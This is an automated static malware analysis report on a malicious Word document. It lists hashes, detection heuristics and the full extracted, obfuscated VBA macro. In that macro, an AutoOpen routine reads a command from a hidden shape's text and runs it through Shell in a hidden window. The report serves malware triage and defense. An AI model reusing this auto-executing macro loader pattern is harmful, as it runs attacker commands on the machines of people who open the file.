Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 be111a7d801f656b…

MALICIOUS

Office (OLE)

Size: 108.8 KB
Created: 2018-12-10 05:53:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 6198042e422778c367f340c0d5c3a3f1
SHA-1: 94d8daa7bffec27467a31bfce3c6af77e54b7ed2
SHA-256: be111a7d801f656b2c8ffdf7d9b56948ce5939877e4bc270c407b11f64e2adbc
Risk Score: 252

Heuristics (9)

  • ClamAV: Doc.Malware.Generic-6779191-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6779191-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    . _
    Shell(MTQjztn, dzVrJs), kdRGJUz)
        ViwXjijvllVfKoz = uXkILDzoHqWwBhrkh / Tan(287653790) * 73483495 / Tan(39885120) + IzYJnOTWHWQqhIVPVv - Cos(116743102) + (243820755 / Int(PsMhuEukzSdtwmY))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    EzrTadlJ
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.iec.ch  [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main  [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5684 bytes
SHA-256: 592dc7e679858eca9e92bd2207ba0a27812008a87a0724147143d5d72442077a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
159 of 189 identifiers look randomly generated (e.g. 'QQHGwILrauuTdVWziPUulmkD') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EYGjqwTRDW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
EzrTadlJ
End Sub

Attribute VB_Name = "fncRnMihOP"
Function EzrTadlJ()
On Error Resume Next
    NmmQZQOpliFSTcZtkSwZt = ZczozmNFKPGCiUZ / Tan(323866946) * 127556681 / Tan(128123572) + pYTqctLozHuzwsIMKQlScbj - Cos(132523628) + (271106235 / Int(QwETnzffDhFlWulz))
Set wQRKKVIPjiARNszBQ = NjdTvSQoaGYuqhfMhDXB
cwEGQiOppGkFRYN = iVztVuBrmrTmBKwdOWlnZ
    EPSYiifVKjkDqWrCTHD = kLRFUaYdACWiwojpkB / Tan(59963809) * 336445910 / Tan(319219107) + POQbXVmljzbrntwMEIF - Cos(18790460) + (137846925 / Int(KBFBmCSSwEWKwDp))
Set CDqPWYHHBqqXzAttEHDPWVi = SNwXUcwuWLFBLFlltzAvL
UzKdGpzaWhVHwIZkmYtwAmv = hwVSVYVmYYsBMrVHvwpYfEJ
    DojwmwlwKmHSzAIi = WlDuwdUKnwDmnkLaM / Tan(290559683) * 305450066 / Tan(102919769) + WCwwIkqofbmAcCGsOELP - Cos(250266800) + (337044417 / Int(hKXBvrmIOSkziGwptdWIXRlK))
Set FiznjAuXDOmliuwsSYirC = lQPSlPrcQZNTqJpVfRp
frMEKiZPEsDSjjwjYRPf = azMXPEnDztQCZstEKHCq
    htbLDrRmIuwMcE = hzhofSaShwwNGvzpAdZzKuO / Tan(223655486) * 185099133 / Tan(24693022) + IDDPidHHkOWXjHatPFdL - Cos(285339936) + (75749891 / Int(vjDHjmizMbqROih))
Set kwnMbdGppkBwcwslzw = fbWYVBPKvtpLOim
MDzdSdNRzlkWOjEUPXBrNaS = MSKwzYmPpEfhwUoC
    roEwfhqISzXcZKARFEBJt = GqumizrkAFwqLM / Tan(249531174) * 145239452 / Tan(111056747) + UCSblJarJkiBKv - Cos(271235897) + (264837383 / Int(NBszsRhwSjiwnfjozorki))
Set kLqnGCwvBBXiYUX = bklcTdssWEwNKG
DDIRhIFLiAWijbJHPQzMGzCl = TwRBEkluDTbPDqu
    fOzkowTTbKRoAFhjhhnJ = FKKJnqkzJGBsqG / Tan(117201737) * 122432425 / Tan(318755319) + JpTAJpvYPTsGChhfaEnaA - Cos(38108729) + (229935519 / Int(RDQvJwPQkzdUhEAUNP))
Set QEDETLLjNfViDGzjFZA = QDcVEDNzVDTNliSRO
wjzSClPOZOjVvuMAKMchzQwO = JMHzZojUFcQQwBrG
    iIRkMrIcCNTwRuMiDQRjtY = jaHtMpZPTFMKwR / Tan(21699033) * 140735682 / Tan(153702913) + quYNwGonmUikHvFIhK - Cos(32945449) + (330091455 / Int(mcwzqEjOQzuuJDicWiBFYDEj))
Set wRFqktQZZESaNFBEZWUnq = safKfDtYiXRQsndYfGiUjzMC
YzAwhktsAZiKZNM = BVuIwNOaBqOJVNsOdBHE
    sFbZKHqjzdWrOlqL = OYuJWGBHOXvAkJiiA / Tan(162763925) * 251580413 / Tan(237415864) + LBKXBpncLVXtqXfzC - Cos(150366331) + (336349825 / Int(SwjvfNUnINMEbwCWkmU))
Set NfCBXGtlClwBnJzPS = roUAUzJTSsUJMPBiN
tiXYTikXPKRSwmEVvjwNLE = EoARtYjzEwMWjqSUlPziwCz
Set GcwwLQN = EYGjqwTRDW.Shapes(izMuqEAWJ + "CswsovRTdNzin" + JnJaPk).TextFrame
    PVEfmazEpjCjqiCIFoflkQWt = JnumYsSNsfHFpUtLLZK / Tan(46497756) * 2650664 / Tan(311717309) + OlzwZGLwzLDdnFSRrjVwCv - Cos(17953573) + (103517333 / Int(laYrLmbOAfBawsGjhI))
Set lqGFtHTXizlSiicnjnGnZcP = aRqurPRVnIidfUfjsPzQPM
sUEZtaUVJbTfbRZfO = QfZDwILHWuKiwXNwwZnq
    ZHTdkjLirstMqjFBHczP = MOdrZRjHdidZSNkKLtPPVq / Tan(127731625) * 20192259 / Tan(151288058) + JzsZQojoNtqlKOfWOJ - Cos(104415501) + (257483864 / Int(TUqviizTVvaUCIjODSp))
Set dzrUZiAjzbJnjwpiCihFjUr = QQHGwILrauuTdVWziPUulmkD
CMZkjMJIsEJatlrPR = pEWBjHhXQzwNdfDo
    cjEDbMkPsHwSvSG = LMdvZYZzAOPuDEzLt / Tan(160739702) * 53682646 / Tan(340808874) + clzdTQXICcqwszOE - Cos(30431878) + (208346723 / Int(KGDNwpLnImZXKG))
Set ibdRGIBpzmYwKEk = psEpEZYDoHcOVdE
rnQnbnZvIRGaXsBjYfji = QAJCZcwfmUThtEX
MTQjztn = GcwwLQN.ContainingRange + nUBMpD + jikzhs + wNlDaK + vRcSzsY + MmjzvW + bawNY + bdUGF + cqXRXaAT + JDrcl + rhAwk
    wNzNtvmSViBjojGcN = zwsRYtmoRCiLUfRIPSpYOqH / Tan(10790314) * 124533773 / Tan(160834474) + RmkDzYdNZahpEaEiknJN - Cos(143418187) + (104151886 / Int(QompiGpqwzPUCjzhmrSr))
Set ickzJMWOJKHBGTOKjwHjj = ppGCzlFXWDXwiLBsVtSco
ISwNkWDsLIwwnvrHPlImnE = IkCJqdNRGuAhnGjAjTir
    wNdLnuzwoOotTQovGVO = mEAnitTXssJbjVYnbIidhQT / Tan(34505266) * 331177485 / Tan(126962599) + BPonfjumsMqdtbZGvFN - Cos(61475998) + (324773521 / Int(AUznlMWlvoOVSIDFduojjbl))
Set oBIJXzlJaIOUpsviQGRB = YIQCpcSUOMZiSzjDM
vDEuJtjPkwFSZJjR = trHhXSpMwplXtMfDt
    wpAviaaXFQKJSp = SkTjNaMltYjzKEriVtB / Tan(300753657) * 31002077 / Tan(283422203) + cTKjlGfEmJbdbdlf - Cos(190345331) + (235812318 / Int(HXwdQTNipQRvUb))
Set rQCubiOTuoiaPEjOYJ = jpdquMXYqnUNHB
mVciIZtDEpiswi = CtlUrhNaIhDFXfZ
    jPpptzbpMLONRIFBOJ = FapVEwjEMOcLaiKCzb / Tan(230636503) * 59158181 / Tan(93579938) + GGbUSVbaXpMhdtqtlrKsO - Cos(182049916) + (236438296 / Int(niHGFZfAFTUjtjjOclqmztAR))
Set FqrwVXiWchjOVVzK = bKYHzBKvPckzAthp
zinBkwpNRBwzHQtcnSqsEGo = DFutYboCYbVOWLqOjthA
    RHTVGPuYIjmrwNzwvkrrajbD = XzNGFLolFjYRDMuR / Tan(276085042) * 338453244 / Tan(134355676) + LsCmorHGlYlfPKjPjRDUwFr - Cos(196405310) + (165079641 / Int(rXzZkjHLwizbSOEhzjzs))
Set sdilYvztGBYNJz = IMoEYEMFSFzpQQGKjjcwu
oMkHRscZNIOUYmssUz = YLfZGjczqshjApoYcURm
Const dzVrJs = 0
    npQjHzvzvnTEzwVsi = ujiKDNjMHwCcAIoFJ / Tan(70262146) * 146376872 / Tan(146687310) + EpjMdWUdWKEVwZzndlC - Cos(323404895) + (308801056 / Int(wzSnLQtmLWMqpqzwZrOilo))
Set HEirRfZTZjOtitqLEkjwiJGj = pfLLiLEHAKjcZbH
DmJbzPEijJwCpPwzzlcANH = UKmiiHifIcMfWwIJaaciYN
    MMmEroVUcQNOkwOn = UGorhSukbwizuSJqPPPW / Tan(42951193) * 219437907 / Tan(341081196) + mUSopdPwoGIOaViusTQpmUiw - Cos(29319541) + (154440022 / Int(izQYmGrENAGvzimLnK))
Set QtlVimRJKRlUjSHjzXiVIjQ = tmYSHzJunJHczdmlV
jncjWcqBpoFpmhcUbrOzCKHr = ZLfjTkwzLCdoNQvbFKUo
lMlcnz = Array(YvwpQ, jWawip, djcArcB, Interaction _
. _
Shell(MTQjztn, dzVrJs), kdRGJUz)
    ViwXjijvllVfKoz = uXkILDzoHqWwBhrkh / Tan(287653790) * 73483495 / Tan(39885120) + IzYJnOTWHWQqhIVPVv - Cos(116743102) + (243820755 / Int(PsMhuEukzSdtwmY))
Set wYpiRAUGIUZVVMwt = OsHMcsKZmJDmzlWzDX
cGpPYGYZfZOlWkYitQ = WffEfqRTLjDXSoYQOYcjFDTf
End Function